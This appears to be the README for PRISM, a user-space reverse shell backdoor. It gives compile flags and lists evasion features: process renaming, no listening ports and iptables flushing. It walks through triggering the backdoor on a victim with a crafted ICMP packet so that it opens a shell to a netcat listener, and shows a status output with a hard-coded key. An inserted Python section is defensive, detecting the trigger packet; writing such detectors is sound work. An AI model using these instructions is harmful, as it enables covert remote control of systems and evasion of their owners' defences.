PRISM is a user-space reverse shell backdoor.
It works in two ways:
ICMP mode
In this mode the backdoor waits silently in the background for a specific ICMP packet containing the host/port to connect back to and a private key to prevent third-party access.
STATIC mode
In this mode the backdoor tries to connect to a hard-coded IP/PORT at specific intervals.
Features:
- Two operating modes (ICMP and STATIC)
- Runtime process renaming
- No listening ports
- Automatic iptables rules flushing
- Written in pure C
- No library dependencies
How to compile:
gcc <..DEFINITIONS..> -Wall -s -o prism prism.c
Available definitions:
-DDETACH    #Run process in background
-DSTATIC    #Enable STATIC mode
-DNORENAME  #Don't rename process
-DIPTABLES  #Try to flush all iptables rules
How to use in ICMP mode:
First you need to write the ICMP packet payload into a file, for example payload.bin, in the following format:
[SECURITY_KEY] [CLIENT_IP] [CLIENT_PORT]
Now, using netcat, we will wait for the incoming connection from the backdoor:
nc -l -p [CLIENT_PORT]
Finally, using nemesis (or another packet builder), we can send the packet to the victim:
nemesis icmp -i 8 -c 0 -D 192.168.0.1 -P payload.bin
At this point the backdoor will connect back to netcat :)
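A defender-side check for the ICMP trigger described above, added here as an example (it is not part of PRISM or of the original page): it flags echo requests (type 8, code 0, as in the nemesis command) whose payload is ASCII text in the [SECURITY_KEY] [CLIENT_IP] [CLIENT_PORT] layout. It assumes whitespace-separated fields and input that starts at the ICMP header; the function names and sample bytes are constructed.

```python
import ipaddress
import struct

ICMP_ECHO_REQUEST = 8  # the "-i 8 -c 0" in the nemesis command above


def parse_trigger(icmp_msg: bytes):
    """Return (key, ip, port) if the ICMP message matches the trigger layout, else None."""
    if len(icmp_msg) < 8:
        return None
    icmp_type, code, _cksum, _ident, _seq = struct.unpack("!BBHHH", icmp_msg[:8])
    if icmp_type != ICMP_ECHO_REQUEST or code != 0:
        return None
    payload = icmp_msg[8:].rstrip(b"\x00\r\n ")  # tolerate padding / trailing newline
    try:
        fields = payload.decode("ascii").split()  # assumption: whitespace-separated
    except UnicodeDecodeError:
        return None
    if len(fields) != 3:
        return None
    key, ip, port = fields
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return None
    if not port.isdigit() or not 1 <= int(port) <= 65535:
        return None
    return key, ip, int(port)


def scan(messages):
    """Return [(index, (key, ip, port)), ...] for every message that matches."""
    return [(i, hit) for i, m in enumerate(messages) if (hit := parse_trigger(m))]


def _msg(icmp_type, code, payload):
    # Constructed sample: ICMP header (checksum left at 0) followed by the payload.
    return struct.pack("!BBHHH", icmp_type, code, 0, 1, 1) + payload


SAMPLES = [  # all constructed for this example
    _msg(8, 0, b"EXAMPLEKEY 198.51.100.7 4444\n"),      # trigger-shaped payload
    _msg(8, 0, b"abcdefghijklmnopqrstuvwabcdefghi"),     # Windows ping default data
    _msg(8, 0, bytes(8) + bytes(range(0x10, 0x38))),     # Linux ping-style data
    _msg(0, 0, b"EXAMPLEKEY 198.51.100.7 4444"),         # echo reply, wrong type
    _msg(8, 0, b"EXAMPLEKEY 198.51.100.999 4444"),       # not a valid IPv4 address
]

if __name__ == "__main__":
    for index, (key, ip, port) in scan(SAMPLES):
        print(f"sample {index}: trigger-shaped echo request -> {ip}:{port}")
```

Because the check keys on the payload layout rather than on a particular key, it also matches builds compiled with a different security key.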
Inf0 option:
$ ./prism Inf0     <-- Zero
 Version: 0.5
 Mode: icmp
 Key: p455w0rD
 Process name: [pdflush]
 Shell: /bin/sh
 Detach: Yes
 Flush Iptables: Yes